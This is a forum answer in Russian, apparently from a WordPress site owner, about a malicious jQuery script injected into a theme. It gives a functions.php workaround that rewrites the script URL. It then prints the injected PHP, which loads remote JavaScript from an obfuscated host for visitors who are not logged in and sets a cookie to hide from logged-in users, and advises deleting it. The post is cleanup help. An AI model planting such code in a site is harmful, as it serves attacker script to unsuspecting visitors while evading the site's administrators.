Я решил это, заменив ссылку на другое, не считающееся вредоносное ПО. Я не смог определить, где делается инъекция, но, по крайней мере, теперь мой сайт «безопасен». Вы должны добавить этот код в конец файла functions.php вашего шаблона:
add_action('wp_footer', 'my_start_footer_ob', 1);
function my_start_footer_ob() {
ob_start("my_end_footer_ob_callback");
}
add_action('wp_footer', 'my_end_footer_ob', 1000);
function my_end_footer_ob() {
ob_end_flush();
}
function my_end_footer_ob_callback($buffer) {
// remove what you need from he buffer
$buffer = str_replace('www.9iwp.org/jquery.js',"www.mysite.org/wp-content/themes/Mytheme/assets/js/empty.js",$buffer);
return $buffer;
}
UPDATE !!
Я нашел, где это!
Это «инъекция» в один из файлов функций шаблона (в моем случае framework / functions / helpers.php)
if(!function_exists('wp_func_jquery')) {
if (!current_user_can( 'read' ) && !isset(${_COOKIE}['wp_min'])) {
function wp_func_jquery() {
$host = 'http://';
$jquery = $host.'lib'.'wp.org/jquery-ui.js';
$headers = @get_headers($jquery, 1);
if ($headers[0] == 'HTTP/1.1 200 OK'){
echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
}
}
add_action('wp_footer', 'wp_func_jquery');
}
function wp_func_min(){
setcookie('wp_min', '1', time() + (86400 * 360), '/');
}
add_action('wp_login', 'wp_func_min');
}
Найдите эту функцию и удалите ее.